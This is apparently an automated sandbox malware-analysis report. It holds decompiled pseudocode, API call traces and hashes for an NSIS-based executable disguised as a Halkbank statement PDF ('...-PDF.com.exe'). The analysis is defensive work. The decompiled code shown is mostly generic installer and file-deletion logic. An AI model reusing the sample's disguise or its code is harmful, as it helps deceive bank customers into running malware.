                                                                    								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                                                    									goto L29;
                                                                    								}
                                                                    								_t177 =  *((intOrPtr*)(_t198 + 8));
                                                                    								__eflags = _t177 - 0x20;
                                                                    								if(_t177 == 0x20) {
                                                                    									L28:
                                                                    									_t36 =  &_v20;
                                                                    									 *_t36 = _v20 | 0x00000004;
                                                                    									__eflags =  *_t36;
                                                                    									goto L29;
                                                                    								}
                                                                    								__eflags = _t177 - _t188;
                                                                    								if(_t177 != _t188) {
                                                                    									goto L29;
                                                                    								}
                                                                    								goto L28;
                                                                    							}
                                                                    							_t178 =  *((intOrPtr*)(_t198 + 2));
                                                                    							__eflags = _t178 - _t209;
                                                                    							if(_t178 == _t209) {
                                                                    								L23:
                                                                    								 *0x42a300 = 1;
                                                                    								goto L24;
                                                                    							}
                                                                    							__eflags = _t178 - _t188;
                                                                    							if(_t178 != _t188) {
                                                                    								goto L24;
                                                                    							}
                                                                    							goto L23;
                                                                    						}
                                                                    					} else {
                                                                    						goto L16;
                                                                    					}
                                                                    					do {
                                                                    						L16:
                                                                    						_t198 = _t198 + 2;
                                                                    						__eflags =  *_t198 - _t209;
                                                                    					} while ( *_t198 == _t209);
                                                                    					goto L17;
                                                                    				}
                                                                    				goto L37;
                                                                    			}



















































                                                                    0x0040364e
                                                                    0x0040364f
                                                                    0x00403656
                                                                    0x00403659
                                                                    0x00403660
                                                                    0x00403663
                                                                    0x00403676
                                                                    0x0040367c
                                                                    0x0040367f
                                                                    0x00403682
                                                                    0x00403690
                                                                    0x00403698
                                                                    0x004036a3
                                                                    0x004036bc
                                                                    0x004036be
                                                                    0x004036c6
                                                                    0x004036c6
                                                                    0x004036d1
                                                                    0x004036d3
                                                                    0x004036d3
                                                                    0x004036e8
                                                                    0x0040370d
                                                                    0x0040371b
                                                                    0x0040371e
                                                                    0x00403725
                                                                    0x0040372c
                                                                    0x0040372c
                                                                    0x00403725
                                                                    0x0040372e
                                                                    0x00403733
                                                                    0x00403734
                                                                    0x00403740
                                                                    0x00403744
                                                                    0x0040374b
                                                                    0x00403759
                                                                    0x0040375e
                                                                    0x00403765
                                                                    0x00403769
                                                                    0x0040376d
                                                                    0x0040376f
                                                                    0x0040376f
                                                                    0x0040376d
                                                                    0x00403776
                                                                    0x0040377d
                                                                    0x00403783
                                                                    0x0040379b
                                                                    0x004037ab
                                                                    0x004037b0
                                                                    0x004037b6
                                                                    0x004037bd
                                                                    0x004037c4
                                                                    0x004037c6
                                                                    0x004037c7
                                                                    0x004037d1
                                                                    0x004037d8
                                                                    0x004037da
                                                                    0x004037dc
                                                                    0x004037dc
                                                                    0x004037ef
                                                                    0x004037f1
                                                                    0x004038eb
                                                                    0x004038eb
                                                                    0x004038ee
                                                                    0x004038f1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004037fb
                                                                    0x004037fc
                                                                    0x004037ff
                                                                    0x00403808
                                                                    0x00403808
                                                                    0x0040380b
                                                                    0x0040380e
                                                                    0x00403811
                                                                    0x00403814
                                                                    0x00403814
                                                                    0x00403814
                                                                    0x00403815
                                                                    0x00403819
                                                                    0x004038d9
                                                                    0x004038e2
                                                                    0x004038e4
                                                                    0x004038e7
                                                                    0x004038ea
                                                                    0x004038ea
                                                                    0x004038ea
                                                                    0x00000000
                                                                    0x0040381f
                                                                    0x00403820
                                                                    0x00403821
                                                                    0x00403825
                                                                    0x0040383f
                                                                    0x00403846
                                                                    0x00403859
                                                                    0x0040385a
                                                                    0x0040386f
                                                                    0x00403874
                                                                    0x00403876
                                                                    0x00403878
                                                                    0x00403894
                                                                    0x0040389b
                                                                    0x004038ae
                                                                    0x004038af
                                                                    0x004038c4
                                                                    0x004038ca
                                                                    0x004038cc
                                                                    0x004038ce
                                                                    0x004038d6
                                                                    0x004038d8
                                                                    0x00000000
                                                                    0x004038d8
                                                                    0x004038d2
                                                                    0x004038d4
                                                                    0x004038f9
                                                                    0x004038fd
                                                                    0x00403906
                                                                    0x0040390b
                                                                    0x00403911
                                                                    0x0040391c
                                                                    0x0040391e
                                                                    0x00403923
                                                                    0x00403925
                                                                    0x0040397d
                                                                    0x00403982
                                                                    0x0040398b
                                                                    0x00403992
                                                                    0x00403995
                                                                    0x00403b6c
                                                                    0x00403b6c
                                                                    0x00403b71
                                                                    0x00403b7a
                                                                    0x00403b97
                                                                    0x00403c0f
                                                                    0x00403c0f
                                                                    0x00403c17
                                                                    0x00403c19
                                                                    0x00403c19
                                                                    0x00403c1f
                                                                    0x00403c1f
                                                                    0x00403bae
                                                                    0x00403bba
                                                                    0x00403bcb
                                                                    0x00403bd2
                                                                    0x00403bd9
                                                                    0x00403bd9
                                                                    0x00403be1
                                                                    0x00403bed
                                                                    0x00403bfb
                                                                    0x00403c06
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403bef
                                                                    0x00403bef
                                                                    0x00403bf0
                                                                    0x00403bf2
                                                                    0x00403bf3
                                                                    0x00403bf4
                                                                    0x00403bf9
                                                                    0x00403c08
                                                                    0x00403c0a
                                                                    0x00000000
                                                                    0x00403c0a
                                                                    0x00000000
                                                                    0x00403bf9
                                                                    0x00403bed
                                                                    0x00403b84
                                                                    0x00403b8b
                                                                    0x00403b8b
                                                                    0x004039a1
                                                                    0x00403a48
                                                                    0x00403a48
                                                                    0x00403a54
                                                                    0x00000000
                                                                    0x00403a54
                                                                    0x004039b2
                                                                    0x004039ba
                                                                    0x00403a0c
                                                                    0x00403a0c
                                                                    0x00403a12
                                                                    0x00403a19
                                                                    0x00403a67
                                                                    0x00403a69
                                                                    0x00403a6e
                                                                    0x00403a70
                                                                    0x00403a78
                                                                    0x00403a78
                                                                    0x00403a83
                                                                    0x00403a88
                                                                    0x00403a8f
                                                                    0x00403a95
                                                                    0x00403a97
                                                                    0x00403b6a
                                                                    0x00403b6a
                                                                    0x00403b6a
                                                                    0x00000000
                                                                    0x00403a9d
                                                                    0x00403a9d
                                                                    0x00403a9f
                                                                    0x00403aa0
                                                                    0x00403aa9
                                                                    0x00403aa2
                                                                    0x00403aa2
                                                                    0x00403aa2
                                                                    0x00403aaf
                                                                    0x00403ab7
                                                                    0x00403abe
                                                                    0x00403ac6
                                                                    0x00403ac6
                                                                    0x00403ad3
                                                                    0x00403adf
                                                                    0x00403ae9
                                                                    0x00403ae9
                                                                    0x00403aeb
                                                                    0x00403af2
                                                                    0x00403afc
                                                                    0x00403b08
                                                                    0x00403b0e
                                                                    0x00403b14
                                                                    0x00403b17
                                                                    0x00403b21
                                                                    0x00403b27
                                                                    0x00403b29
                                                                    0x00403b2d
                                                                    0x00403b3e
                                                                    0x00403b44
                                                                    0x00403b49
                                                                    0x00403b4b
                                                                    0x00403b4e
                                                                    0x00403b54
                                                                    0x00403b54
                                                                    0x00403b4b
                                                                    0x00403b29
                                                                    0x00403b57
                                                                    0x00403b5e
                                                                    0x00403b5e
                                                                    0x00403b5e
                                                                    0x00403b5e
                                                                    0x00403b65
                                                                    0x00000000
                                                                    0x00403b65
                                                                    0x00403a97
                                                                    0x00403a1b
                                                                    0x00403a1e
                                                                    0x00403a22
                                                                    0x00403a27
                                                                    0x00403a29
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403a35
                                                                    0x00403a40
                                                                    0x00403a45
                                                                    0x00000000
                                                                    0x00403a45
                                                                    0x004039c3
                                                                    0x004039db
                                                                    0x004039ec
                                                                    0x004039ed
                                                                    0x004039f1
                                                                    0x004039f3
                                                                    0x00403a01
                                                                    0x00403a08
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403a08
                                                                    0x00403a0a
                                                                    0x00000000
                                                                    0x00403a0a
                                                                    0x0040392d
                                                                    0x00403939
                                                                    0x0040393e
                                                                    0x00403943
                                                                    0x00403945
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040394d
                                                                    0x00403955
                                                                    0x00403966
                                                                    0x0040396e
                                                                    0x00403970
                                                                    0x00403975
                                                                    0x00403977
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403977
                                                                    0x00000000
                                                                    0x004038d4
                                                                    0x0040387d
                                                                    0x0040387f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403881
                                                                    0x00403885
                                                                    0x00403889
                                                                    0x00403890
                                                                    0x00403890
                                                                    0x00403890
                                                                    0x00403890
                                                                    0x00000000
                                                                    0x00403890
                                                                    0x0040388b
                                                                    0x0040388e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040388e
                                                                    0x00403827
                                                                    0x0040382b
                                                                    0x0040382e
                                                                    0x00403835
                                                                    0x00403835
                                                                    0x00000000
                                                                    0x00403835
                                                                    0x00403830
                                                                    0x00403833
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403833
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403801
                                                                    0x00403801
                                                                    0x00403802
                                                                    0x00403803
                                                                    0x00403803
                                                                    0x00000000
                                                                    0x00403801
                                                                    0x00000000

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                    • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                    • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                    • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                    • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                    • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe",00000020,"C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe",00000000), ref: 004037E9
                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                    • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                      • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe",00000000,?), ref: 00403A8F
                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                    • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,00420F08,00000001), ref: 00403B21
                                                                    • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                    • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                                    • OleUninitialize.OLE32(?), ref: 00403B71
                                                                    • ExitProcess.KERNEL32 ref: 00403B8B
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                    • ExitProcess.KERNEL32 ref: 00403C1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                    • String ID: "C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                    • API String ID: 2292928366-1291424025
                                                                    • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                    • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                    • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                    • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                                    C-Code - Quality: 98%
                                                                    			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				short _v556;
                                                                    				short _v558;
                                                                    				struct _WIN32_FIND_DATAW _v604;
                                                                    				signed int _t38;
                                                                    				signed int _t52;
                                                                    				signed int _t55;
                                                                    				signed int _t62;
                                                                    				void* _t64;
                                                                    				signed char _t65;
                                                                    				WCHAR* _t66;
                                                                    				void* _t67;
                                                                    				WCHAR* _t68;
                                                                    				void* _t70;
                                                                    
                                                                    				_t65 = _a8;
                                                                    				_t68 = _a4;
                                                                    				_v8 = _t65 & 0x00000004;
                                                                    				_t38 = E0040603F(__eflags, _t68);
                                                                    				_v12 = _t38;
                                                                    				if((_t65 & 0x00000008) != 0) {
                                                                    					_t62 = DeleteFileW(_t68); // executed
                                                                    					asm("sbb eax, eax");
                                                                    					_t64 =  ~_t62 + 1;
                                                                    					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                                    					return _t64;
                                                                    				}
                                                                    				_a4 = _t65;
                                                                    				_t8 =  &_a4;
                                                                    				 *_t8 = _a4 & 0x00000001;
                                                                    				__eflags =  *_t8;
                                                                    				if( *_t8 == 0) {
                                                                    					L5:
                                                                    					E00406668(0x425750, _t68);
                                                                    					__eflags = _a4;
                                                                    					if(_a4 == 0) {
                                                                    						E00405F83(_t68);
                                                                    					} else {
                                                                    						lstrcatW(0x425750, L"\\*.*");
                                                                    					}
                                                                    					__eflags =  *_t68;
                                                                    					if( *_t68 != 0) {
                                                                    						L10:
                                                                    						lstrcatW(_t68, 0x40a014);
                                                                    						L11:
                                                                    						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                    						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                                                                    						_t70 = _t38;
                                                                    						__eflags = _t70 - 0xffffffff;
                                                                    						if(_t70 == 0xffffffff) {
                                                                    							L26:
                                                                    							__eflags = _a4;
                                                                    							if(_a4 != 0) {
                                                                    								_t30 = _t66 - 2;
                                                                    								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                    								__eflags =  *_t30;
                                                                    							}
                                                                    							goto L28;
                                                                    						} else {
                                                                    							goto L12;
                                                                    						}
                                                                    						do {
                                                                    							L12:
                                                                    							__eflags = _v604.cFileName - 0x2e;
                                                                    							if(_v604.cFileName != 0x2e) {
                                                                    								L16:
                                                                    								E00406668(_t66,  &(_v604.cFileName));
                                                                    								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                    								if(__eflags == 0) {
                                                                    									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                                    									__eflags = _t52;
                                                                    									if(_t52 != 0) {
                                                                    										E004056CA(0xfffffff2, _t68);
                                                                    									} else {
                                                                    										__eflags = _v8 - _t52;
                                                                    										if(_v8 == _t52) {
                                                                    											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                    										} else {
                                                                    											E004056CA(0xfffffff1, _t68);
                                                                    											E00406428(_t67, _t68, 0);
                                                                    										}
                                                                    									}
                                                                    								} else {
                                                                    									__eflags = (_a8 & 0x00000003) - 3;
                                                                    									if(__eflags == 0) {
                                                                    										E00405D74(__eflags, _t68, _a8);
                                                                    									}
                                                                    								}
                                                                    								goto L24;
                                                                    							}
                                                                    							__eflags = _v558;
                                                                    							if(_v558 == 0) {
                                                                    								goto L24;
                                                                    							}
                                                                    							__eflags = _v558 - 0x2e;
                                                                    							if(_v558 != 0x2e) {
                                                                    								goto L16;
                                                                    							}
                                                                    							__eflags = _v556;
                                                                    							if(_v556 == 0) {
                                                                    								goto L24;
                                                                    							}
                                                                    							goto L16;
                                                                    							L24:
                                                                    							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                                                    							__eflags = _t55;
                                                                    						} while (_t55 != 0);
                                                                    						_t38 = FindClose(_t70); // executed
                                                                    						goto L26;
                                                                    					}
                                                                    					__eflags =  *0x425750 - 0x5c;
                                                                    					if( *0x425750 != 0x5c) {
                                                                    						goto L11;
                                                                    					}
                                                                    					goto L10;
                                                                    				} else {
                                                                    					__eflags = _t38;
                                                                    					if(_t38 == 0) {
                                                                    						L28:
                                                                    						__eflags = _a4;
                                                                    						if(_a4 == 0) {
                                                                    							L36:
                                                                    							return _t38;
                                                                    						}
                                                                    						__eflags = _v12;
                                                                    						if(_v12 != 0) {
                                                                    							_t38 = E0040699E(_t68);
                                                                    							__eflags = _t38;
                                                                    							if(_t38 == 0) {
                                                                    								goto L36;
                                                                    							}
                                                                    							E00405F37(_t68);
                                                                    							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                                    							__eflags = _t38;
                                                                    							if(_t38 != 0) {
                                                                    								return E004056CA(0xffffffe5, _t68);
                                                                    							}
                                                                    							__eflags = _v8;
                                                                    							if(_v8 == 0) {
                                                                    								goto L30;
                                                                    							}
                                                                    							E004056CA(0xfffffff1, _t68);
                                                                    							return E00406428(_t67, _t68, 0);
                                                                    						}
                                                                    						L30:
                                                                    						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                    						return _t38;
                                                                    					}
                                                                    					__eflags = _t65 & 0x00000002;
                                                                    					if((_t65 & 0x00000002) == 0) {
                                                                    						goto L28;
                                                                    					}
                                                                    					goto L5;
                                                                    				}
                                                                    			}


















                                                                    0x00405d7e
                                                                    0x00405d83
                                                                    0x00405d8c
                                                                    0x00405d8f
                                                                    0x00405d97
                                                                    0x00405d9a
                                                                    0x00405d9d
                                                                    0x00405da5
                                                                    0x00405da7
                                                                    0x00405da8
                                                                    0x00000000
                                                                    0x00405da8
                                                                    0x00405db3
                                                                    0x00405db6
                                                                    0x00405db6
                                                                    0x00405db6
                                                                    0x00405dba
                                                                    0x00405dcd
                                                                    0x00405dd4
                                                                    0x00405dd9
                                                                    0x00405ddd
                                                                    0x00405ded
                                                                    0x00405ddf
                                                                    0x00405de5
                                                                    0x00405de5
                                                                    0x00405df2
                                                                    0x00405df6
                                                                    0x00405e02
                                                                    0x00405e08
                                                                    0x00405e0d
                                                                    0x00405e13
                                                                    0x00405e1e
                                                                    0x00405e24
                                                                    0x00405e26
                                                                    0x00405e29
                                                                    0x00405ed3
                                                                    0x00405ed3
                                                                    0x00405ed7
                                                                    0x00405ed9
                                                                    0x00405ed9
                                                                    0x00405ed9
                                                                    0x00405ed9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e2f
                                                                    0x00405e2f
                                                                    0x00405e2f
                                                                    0x00405e37
                                                                    0x00405e57
                                                                    0x00405e5f
                                                                    0x00405e64
                                                                    0x00405e6b
                                                                    0x00405e86
                                                                    0x00405e8b
                                                                    0x00405e8d
                                                                    0x00405eb1
                                                                    0x00405e8f
                                                                    0x00405e8f
                                                                    0x00405e92
                                                                    0x00405ea6
                                                                    0x00405e94
                                                                    0x00405e97
                                                                    0x00405e9f
                                                                    0x00405e9f
                                                                    0x00405e92
                                                                    0x00405e6d
                                                                    0x00405e73
                                                                    0x00405e75
                                                                    0x00405e7b
                                                                    0x00405e7b
                                                                    0x00405e75
                                                                    0x00000000
                                                                    0x00405e6b
                                                                    0x00405e39
                                                                    0x00405e41
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e43
                                                                    0x00405e4b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e4d
                                                                    0x00405e55
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405eb6
                                                                    0x00405ebe
                                                                    0x00405ec4
                                                                    0x00405ec4
                                                                    0x00405ecd
                                                                    0x00000000
                                                                    0x00405ecd
                                                                    0x00405df8
                                                                    0x00405e00
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405dbc
                                                                    0x00405dbc
                                                                    0x00405dbe
                                                                    0x00405ede
                                                                    0x00405ee0
                                                                    0x00405ee3
                                                                    0x00405f34
                                                                    0x00405f34
                                                                    0x00405f34
                                                                    0x00405ee5
                                                                    0x00405ee8
                                                                    0x00405ef3
                                                                    0x00405ef8
                                                                    0x00405efa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405efd
                                                                    0x00405f09
                                                                    0x00405f0e
                                                                    0x00405f10
                                                                    0x00000000
                                                                    0x00405f2b
                                                                    0x00405f12
                                                                    0x00405f15
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405f1a
                                                                    0x00000000
                                                                    0x00405f21
                                                                    0x00405eea
                                                                    0x00405eea
                                                                    0x00000000
                                                                    0x00405eea
                                                                    0x00405dc4
                                                                    0x00405dc7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405dc7

                                                                    APIs
                                                                    • DeleteFileW.KERNELBASE(?,?,766DFAA0,766DF560,00000000), ref: 00405D9D
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr4AC7.tmp\*.*,\*.*), ref: 00405DE5
                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsr4AC7.tmp\*.*,?,?,766DFAA0,766DF560,00000000), ref: 00405E0E
                                                                    • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsr4AC7.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsr4AC7.tmp\*.*,?,?,766DFAA0,766DF560,00000000), ref: 00405E1E
                                                                    • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                    • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsr4AC7.tmp\*.*$\*.*
                                                                    • API String ID: 2035342205-2868300399
                                                                    • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                    • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                    • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                    • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
